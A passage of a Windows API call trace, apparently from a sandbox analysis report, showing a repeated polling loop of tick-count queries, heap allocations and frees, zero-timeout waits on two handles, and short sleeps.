GetTickCount () returned 0x213bd2e [0188.985] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0188.985] GetTickCount () returned 0x213bd2e [0188.985] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0188.985] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65170 | out: hHeap=0x2150000) returned 1 [0188.985] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.988] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.990] GetTickCount () returned 0x213c5c4 [0188.990] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e65170 [0188.990] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.990] GetTickCount () returned 0x213c5c4 [0188.990] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0188.990] GetTickCount () returned 0x213c5c4 [0188.990] GetTickCount () returned 0x213c5c4 [0188.990] GetTickCount () returned 0x213c5c4 [0188.990] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0188.990] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.990] GetTickCount () returned 0x213c5c4 [0188.990] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0188.990] GetTickCount () returned 0x213c5c4 [0188.990] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0188.990] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65170 | out: hHeap=0x2150000) returned 1 [0188.990] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.992] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.993] GetTickCount () returned 0x213ce6a [0188.993] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64c70 [0188.993] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.993] GetTickCount () returned 0x213ce6a [0188.993] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0188.993] GetTickCount () returned 0x213ce6a [0188.993] GetTickCount () returned 0x213ce6a [0188.993] GetTickCount () returned 0x213ce6a [0188.993] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0188.993] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.993] GetTickCount () returned 0x213ce6a [0188.993] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0188.993] GetTickCount () returned 0x213ce6a [0188.994] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0188.994] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64c70 | out: hHeap=0x2150000) returned 1 [0188.994] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.995] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.997] GetTickCount () returned 0x213d700 [0188.997] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64c70 [0188.997] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.997] GetTickCount () returned 0x213d700 [0188.997] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0188.997] GetTickCount () returned 0x213d700 [0188.997] GetTickCount () returned 0x213d700 [0188.997] GetTickCount () returned 0x213d700 [0188.997] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0188.997] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.997] GetTickCount () returned 0x213d700 [0188.997] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0188.997] GetTickCount () returned 0x213d700 [0188.997] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0188.997] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64c70 | out: hHeap=0x2150000) returned 1 [0188.997] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.999] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.000] GetTickCount () returned 0x213df96 [0189.000] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e650f0 [0189.000] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.000] GetTickCount () returned 0x213df96 [0189.000] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79710 [0189.000] GetTickCount () returned 0x213df96 [0189.000] GetTickCount () returned 0x213df96 [0189.000] GetTickCount () returned 0x213df96 [0189.000] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79710 | out: hHeap=0x2150000) returned 1 [0189.000] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.000] GetTickCount () returned 0x213df96 [0189.000] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.000] GetTickCount () returned 0x213df96 [0189.001] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.001] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e650f0 | out: hHeap=0x2150000) returned 1 [0189.001] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.005] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.007] GetTickCount () returned 0x213e82c [0189.007] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64c70 [0189.007] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.007] GetTickCount () returned 0x213e82c [0189.007] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.007] GetTickCount () returned 0x213e82c [0189.007] GetTickCount () returned 0x213e82c [0189.007] GetTickCount () returned 0x213e82c [0189.007] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.007] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.007] GetTickCount () returned 0x213e82c [0189.007] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.007] GetTickCount () returned 0x213e82c [0189.007] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.007] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64c70 | out: hHeap=0x2150000) returned 1 [0189.007] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.009] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.010] GetTickCount () returned 0x213f0d2 [0189.010] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64d30 [0189.010] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.010] GetTickCount () returned 0x213f0d2 [0189.010] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e798c0 [0189.010] GetTickCount () returned 0x213f0d2 [0189.010] GetTickCount () returned 0x213f0d2 [0189.010] GetTickCount () returned 0x213f0d2 [0189.010] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e798c0 | out: hHeap=0x2150000) returned 1 [0189.010] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.010] GetTickCount () returned 0x213f0d2 [0189.010] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.010] GetTickCount () returned 0x213f0d2 [0189.011] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.011] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64d30 | out: hHeap=0x2150000) returned 1 [0189.011] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.012] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.014] GetTickCount () returned 0x213f968 [0189.014] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64e30 [0189.014] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.014] GetTickCount () returned 0x213f968 [0189.014] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79860 [0189.014] GetTickCount () returned 0x213f968 [0189.014] GetTickCount () returned 0x213f968 [0189.014] GetTickCount () returned 0x213f968 [0189.014] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79860 | out: hHeap=0x2150000) returned 1 [0189.014] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.014] GetTickCount () returned 0x213f968 [0189.014] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.014] GetTickCount () returned 0x213f968 [0189.014] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.014] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64e30 | out: hHeap=0x2150000) returned 1 [0189.014] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.016] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.017] GetTickCount () returned 0x21401fe [0189.017] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64d30 [0189.017] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.017] GetTickCount () returned 0x21401fe [0189.017] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.017] GetTickCount () returned 0x21401fe [0189.017] GetTickCount () returned 0x21401fe [0189.017] GetTickCount () returned 0x21401fe [0189.017] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.017] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.017] GetTickCount () returned 0x21401fe [0189.017] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.017] GetTickCount () returned 0x21401fe [0189.018] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.018] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64d30 | out: hHeap=0x2150000) returned 1 [0189.018] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.023] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.025] GetTickCount () returned 0x2140aa3 [0189.025] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e65030 [0189.025] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.025] GetTickCount () returned 0x2140aa3 [0189.025] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.025] GetTickCount () returned 0x2140aa3 [0189.025] GetTickCount () returned 0x2140aa3 [0189.025] GetTickCount () returned 0x2140aa3 [0189.025] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.025] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.025] GetTickCount () returned 0x2140aa3 [0189.025] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.025] GetTickCount () returned 0x2140aa3 [0189.025] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.025] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65030 | out: hHeap=0x2150000) returned 1 [0189.025] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.027] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.028] GetTickCount () returned 0x2141339 [0189.028] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64c70 [0189.028] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.028] GetTickCount () returned 0x2141339 [0189.028] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.028] GetTickCount () returned 0x2141339 [0189.028] GetTickCount () returned 0x2141339 [0189.028] GetTickCount () returned 0x2141339 [0189.028] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.028] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.028] GetTickCount () returned 0x2141339 [0189.028] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79860 [0189.028] GetTickCount () returned 0x2141339 [0189.029] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79860 | out: hHeap=0x2150000) returned 1 [0189.029] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64c70 | out: hHeap=0x2150000) returned 1 [0189.029] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.030] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.032] GetTickCount () returned 0x2141bcf [0189.032] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e65030 [0189.032] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.032] GetTickCount () returned 0x2141bcf [0189.032] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.032] GetTickCount () returned 0x2141bcf [0189.032] GetTickCount () returned 0x2141bcf [0189.032] GetTickCount () returned 0x2141bcf [0189.032] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.032] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.032] GetTickCount () returned 0x2141bcf [0189.032] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.032] GetTickCount () returned 0x2141bcf [0189.032] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.032] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65030 | out: hHeap=0x2150000) returned 1 [0189.032] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.034] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.037] GetTickCount () returned 0x2142465 [0189.037] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64af0 [0189.037] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.037] GetTickCount () returned 0x2142465 [0189.037] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.037] GetTickCount () returned 0x2142465 [0189.037] GetTickCount () returned 0x2142465 [0189.037] GetTickCount () returned 0x2142465 [0189.037] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.037] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.037] GetTickCount () returned 0x2142465 [0189.037] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.037] GetTickCount () returned 0x2142465 [0189.037] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.037] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64af0 | out: hHeap=0x2150000) returned 1 [0189.037] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.039] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.042] GetTickCount () returned 0x2142d0b [0189.042] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64c70 [0189.042] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.042] GetTickCount () returned 0x2142d0b [0189.042] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.042] GetTickCount () returned 0x2142d0b [0189.042] GetTickCount () returned 0x2142d0b [0189.042] GetTickCount () returned 0x2142d0b [0189.042] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.042] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.042] GetTickCount () returned 0x2142d0b [0189.042] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.042] GetTickCount () returned 0x2142d0b [0189.042] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.043] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64c70 | out: hHeap=0x2150000) returned 1 [0189.043] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.044] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.046] GetTickCount () returned 0x21435a1 [0189.046] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64cb0 [0189.046] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.046] GetTickCount () returned 0x21435a1 [0189.046] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.046] GetTickCount () returned 0x21435a1 [0189.046] GetTickCount () returned 0x21435a1 [0189.046] GetTickCount () returned 0x21435a1 [0189.046] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.046] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.046] GetTickCount () returned 0x21435a1 [0189.046] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e795c0 [0189.046] GetTickCount () returned 0x21435a1 [0189.046] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e795c0 | out: hHeap=0x2150000) returned 1 [0189.046] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64cb0 | out: hHeap=0x2150000) returned 1 [0189.046] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.048] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.049] GetTickCount () returned 0x2143e37 [0189.049] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e651f0 [0189.049] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.049] GetTickCount () returned 0x2143e37 [0189.049] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.049] GetTickCount () returned 0x2143e37 [0189.049] GetTickCount () returned 0x2143e37 [0189.049] GetTickCount () returned 0x2143e37 [0189.049] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.049] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.049] GetTickCount () returned 0x2143e37 [0189.049] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.049] GetTickCount () returned 0x2143e37 [0189.050] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.050] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e651f0 | out: hHeap=0x2150000) returned 1 [0189.050] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.053] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.054] GetTickCount () returned 0x21446dd [0189.054] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e65170 [0189.054] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.054] GetTickCount () returned 0x21446dd [0189.054] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79650 [0189.054] GetTickCount () returned 0x21446dd [0189.054] GetTickCount () returned 0x21446dd [0189.054] GetTickCount () returned 0x21446dd [0189.054] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79650 | out: hHeap=0x2150000) returned 1 [0189.054] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.054] GetTickCount () returned 0x21446dd [0189.054] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.054] GetTickCount () returned 0x21446dd [0189.055] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.055] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65170 | out: hHeap=0x2150000) returned 1 [0189.055] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.056] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.058] GetTickCount () returned 0x2144f73 [0189.058] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64bf0 [0189.058] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.058] GetTickCount () returned 0x2144f73 [0189.058] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.058] GetTickCount () returned 0x2144f73 [0189.058] GetTickCount () returned 0x2144f73 [0189.058] GetTickCount () returned 0x2144f73 [0189.058] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.058] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.058] GetTickCount () returned 0x2144f73 [0189.058] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.058] GetTickCount () returned 0x2144f73 [0189.058] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.058] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64bf0 | out: hHeap=0x2150000) returned 1 [0189.058] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.060] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.063] GetTickCount () returned 0x2145809 [0189.063] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64cb0 [0189.063] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.063] GetTickCount () returned 0x2145809 [0189.063] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.063] GetTickCount () returned 0x2145809 [0189.063] GetTickCount () returned 0x2145809 [0189.063] GetTickCount () returned 0x2145809 [0189.063] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.063] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.063] GetTickCount () returned 0x2145809 [0189.063] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.064] GetTickCount () returned 0x2145809 [0189.064] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.064] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64cb0 | out: hHeap=0x2150000) returned 1 [0189.064] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.065] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.069] GetTickCount () returned 0x214609f [0189.069] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64af0 [0189.069] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.069] GetTickCount () returned 0x214609f [0189.069] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.069] GetTickCount () returned 0x214609f [0189.069] GetTickCount () returned 0x214609f [0189.069] GetTickCount () returned 0x214609f [0189.069] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.069] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.069] GetTickCount () returned 0x214609f [0189.069] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.069] GetTickCount () returned 0x214609f [0189.069] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.069] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64af0 | out: hHeap=0x2150000) returned 1 [0189.069] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.071] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.072] GetTickCount () returned 0x2146944 [0189.072] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e65170 [0189.072] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.072] GetTickCount () returned 0x2146944 [0189.072] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.072] GetTickCount () returned 0x2146944 [0189.072] GetTickCount () returned 0x2146944 [0189.072] GetTickCount () returned 0x2146944 [0189.072] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.072] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.072] GetTickCount () returned 0x2146944 [0189.072] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79710 [0189.072] GetTickCount () returned 0x2146944 [0189.073] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79710 | out: hHeap=0x2150000) returned 1 [0189.073] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65170 | out: hHeap=0x2150000) returned 1 [0189.073] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.074] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.076] GetTickCount () returned 0x21471da [0189.076] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e65170 [0189.076] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.076] GetTickCount () returned 0x21471da [0189.076] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.076] GetTickCount () returned 0x21471da [0189.076] GetTickCount () returned 0x21471da [0189.076] GetTickCount () returned 0x21471da [0189.076] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.076] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.076] GetTickCount () returned 0x21471da [0189.076] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79860 [0189.076] GetTickCount () returned 0x21471da [0189.076] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79860 | out: hHeap=0x2150000) returned 1 [0189.076] 